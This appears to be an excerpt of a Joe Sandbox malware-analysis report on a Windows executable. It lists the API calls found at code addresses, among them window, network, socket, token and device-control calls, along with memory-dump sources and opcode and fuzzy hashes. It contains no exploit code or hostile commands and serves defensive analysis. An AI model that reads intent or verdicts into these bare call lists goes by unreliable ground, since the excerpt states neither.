                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2759813231-0
                                                                                                                                                                                                                                                      • Opcode ID: c42447c8671c230cb5fb2cf94b2b56ead406443dbad7f4dd43884810ac662705
                                                                                                                                                                                                                                                      • Instruction ID: 80a071c9ec86719cd0f3e98d1d272b87f241eb861d59f463ae7d6ad1b4bebfb8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c42447c8671c230cb5fb2cf94b2b56ead406443dbad7f4dd43884810ac662705
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A311E76900108AFDB00EFA5DC459EFFBF9EF94310B10946AE915E3211DA359E059BA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F2F211
                                                                                                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F3E4C0,?,?,?,?,?), ref: 00F2F226
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F2F270
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F3E4C0,?,?,?), ref: 00F2F2A6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2864067406-0
                                                                                                                                                                                                                                                      • Opcode ID: b461a578bf4a680304742eaff21e8588f09be9ff87d23d856bc4274c04618274
                                                                                                                                                                                                                                                      • Instruction ID: 9ea299a3e69d65e122bf9951f5494135e390cd2adf6c2ca66ca684fef20b2314
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b461a578bf4a680304742eaff21e8588f09be9ff87d23d856bc4274c04618274
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC217E39A10028EFCB159F94E858EFA7BB9FF0A720F184179F9059B2A1D7309951EB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F14358
                                                                                                                                                                                                                                                        • Part of subcall function 00F143E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F14401
                                                                                                                                                                                                                                                        • Part of subcall function 00F143E2: InternetCloseHandle.WININET(00000000), ref: 00F1449E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1463438336-0
                                                                                                                                                                                                                                                      • Opcode ID: dbad58b844b3adeb3b676e89c1f6035950cfcf1ff7e54346fd133d25aad084f0
                                                                                                                                                                                                                                                      • Instruction ID: 6f829e1f47d8dc482b961274dcf6790949a2987695356dc0656ceb136b4f895c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbad58b844b3adeb3b676e89c1f6035950cfcf1ff7e54346fd133d25aad084f0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E21C636600605BFEB159F60DC00FFBBBA9FFD8710F10401AFA2596650D775A8A1BB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00F18AE0
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00F18AF2
                                                                                                                                                                                                                                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00F18AFF
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00F18B16
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLastacceptselect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 385091864-0
                                                                                                                                                                                                                                                      • Opcode ID: ebe7a0ddb2e121ea2de162172a2e11113a484ebd974a3754e11f446ccd7aafae
                                                                                                                                                                                                                                                      • Instruction ID: 14ef8847fc549560d3f8618f21acfb890bf8cfd721bc9e78099454fb3f16849b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebe7a0ddb2e121ea2de162172a2e11113a484ebd974a3754e11f446ccd7aafae
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70219376A001249FC711DF68DD85ADEBBECEF9A350F00416AF849E7290DB749E819F90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00F28AA6
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F28AC0
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F28ACE
                                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F28ADC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2169480361-0
                                                                                                                                                                                                                                                      • Opcode ID: cf45a73d5e14220eb53305887a582db896792d06c75ac5feeee2cfdffb0d8efa
                                                                                                                                                                                                                                                      • Instruction ID: 86873f87bfb8b683d931add2d93687f359c5e0e267d3e56c4f6137b105dac749
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf45a73d5e14220eb53305887a582db896792d06c75ac5feeee2cfdffb0d8efa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D11EE31306124AFDB04AB28DC05FBA77D9AF86320F14411EF916D72E1CF75AC029B90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F01E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F00ABB,?,?,?,00F0187A,00000000,000000EF,00000119,?,?), ref: 00F01E77
                                                                                                                                                                                                                                                        • Part of subcall function 00F01E68: lstrcpyW.KERNEL32(00000000,?,?,00F00ABB,?,?,?,00F0187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F01E9D
                                                                                                                                                                                                                                                        • Part of subcall function 00F01E68: lstrcmpiW.KERNEL32(00000000,?,00F00ABB,?,?,?,00F0187A,00000000,000000EF,00000119,?,?), ref: 00F01ECE
                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F0187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F00AD4
                                                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00F0187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F00AFA
                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F0187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F00B2E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: cdecl
                                                                                                                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                      • Opcode ID: 87a8755a9b0dcee29f8cc87805f9419ddb38d3d13a58482f3d1397fe1d8ccfc3
                                                                                                                                                                                                                                                      • Instruction ID: 477a478d6a0a4532cbde6fc1503f467e7b3d5442252c118625f143df9c65b61c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87a8755a9b0dcee29f8cc87805f9419ddb38d3d13a58482f3d1397fe1d8ccfc3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6118E7A200305AFDB25AF24DC45E7A77A8FF85364F80406AE806CB290EF719851E7A1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00EF2FB5
                                                                                                                                                                                                                                                        • Part of subcall function 00EE395C: __FF_MSGBANNER.LIBCMT ref: 00EE3973
                                                                                                                                                                                                                                                        • Part of subcall function 00EE395C: __NMSG_WRITE.LIBCMT ref: 00EE397A
                                                                                                                                                                                                                                                        • Part of subcall function 00EE395C: RtlAllocateHeap.NTDLL(01120000,00000000,00000001,00000001,00000000,?,?,00EDF507,?,0000000E), ref: 00EE399F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                                                                                                                      • Opcode ID: fdf1e32d10b8978661f5e2f97734398c3568bc098b34c57249db6a564ffeabfe
                                                                                                                                                                                                                                                      • Instruction ID: 7cb96c43833fc54da7e10c391df2ff01f6aab20296f111e818e7029786cd984b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fdf1e32d10b8978661f5e2f97734398c3568bc098b34c57249db6a564ffeabfe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C110A3260825EABCB313F71AC046797BD8AF54364F30652AFA49FA251DF30C9409790
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EDEBB2
                                                                                                                                                                                                                                                        • Part of subcall function 00EC51AF: _memset.LIBCMT ref: 00EC522F
                                                                                                                                                                                                                                                        • Part of subcall function 00EC51AF: _wcscpy.LIBCMT ref: 00EC5283
                                                                                                                                                                                                                                                        • Part of subcall function 00EC51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EC5293
                                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00EDEC07
                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EDEC16
                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F33C88
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1378193009-0
                                                                                                                                                                                                                                                      • Opcode ID: 107c479566a124b8ee881fd129ec50b371be72c547db0e1ca3b7fd12473e6e17
                                                                                                                                                                                                                                                      • Instruction ID: cd0f37b2ecf9389c8ca7f2ad61b26c0ad7e9600403dff37e5ee50e366f8e2b30
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 107c479566a124b8ee881fd129ec50b371be72c547db0e1ca3b7fd12473e6e17
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D21DA759047949FE733D7248C59BEBFBEC9B11318F04144DE68A6A341C3742A85DB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F005AC
                                                                                                                                                                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F005C7
                                                                                                                                                                                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F005DD
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00F00632
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3137044355-0
                                                                                                                                                                                                                                                      • Opcode ID: e3318d2e97883306df17a76c80336a69d26e7c0b949307223dc741606b986880
                                                                                                                                                                                                                                                      • Instruction ID: f3f64adad5d1e28ecd290da10c651979580416387dd2c95581586039a1957b1a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3318d2e97883306df17a76c80336a69d26e7c0b949307223dc741606b986880
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09217F71940209EFDB208F91DC88BEABBB9EF80704F008469E91692190DF75EA55FF51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F06733
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F06754
                                                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00F067A6
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F067AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1157408455-0
                                                                                                                                                                                                                                                      • Opcode ID: 8f6d160e9641d7b1d8928ad8349fed98436b9de87c2005969697c6935bff730f
                                                                                                                                                                                                                                                      • Instruction ID: dd2282d647533f6250d016080afac49ae34a9182f5b8c6f91de1d1526016fca8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f6d160e9641d7b1d8928ad8349fed98436b9de87c2005969697c6935bff730f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D110A76D0122C7AE7205BA5AC4DFABBABCEF45B64F10419AF904E71C0D7704F809B64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EFAA79
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EFAA83
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EFAA92
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EFAA99
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EFAAAF
                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00EFADE4,?,?), ref: 00EFB21B
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EFB227
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00EFB22E
                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(?,00000000,?), ref: 00EFB247
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4217664535-0
                                                                                                                                                                                                                                                      • Opcode ID: ae9b4f2c7e8c42e5558f863520d77258a3763becb8c0f98c3e1843770bab6ade
                                                                                                                                                                                                                                                      • Instruction ID: df9b81e8bddc932f9a4dea4f0f4973331de337ad2d260eab7866fb0c4f8fa628
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae9b4f2c7e8c42e5558f863520d77258a3763becb8c0f98c3e1843770bab6ade
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF119475A0020DEFEB149F58DC95ABFB7A9EF95308F14902DEA46A7220D7319E44DB10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EFB498
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EFB4AA
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EFB4C0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EFB4DB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                      • Opcode ID: 1c6a61b58711d0988603ad84656515a5d5139816513c5ea14db2022c3e5a6fb7
                                                                                                                                                                                                                                                      • Instruction ID: 97d337a706220b3cf27ed42c3592e77ee5974ba210ee2e8595c6d84a3076dac3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c6a61b58711d0988603ad84656515a5d5139816513c5ea14db2022c3e5a6fb7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76112A7A900218FFDB11DFA9C985EADBBB4FB08710F204091EA14B7295D771AE11DB94
                                                                                                                                                                                                                                                      APIs
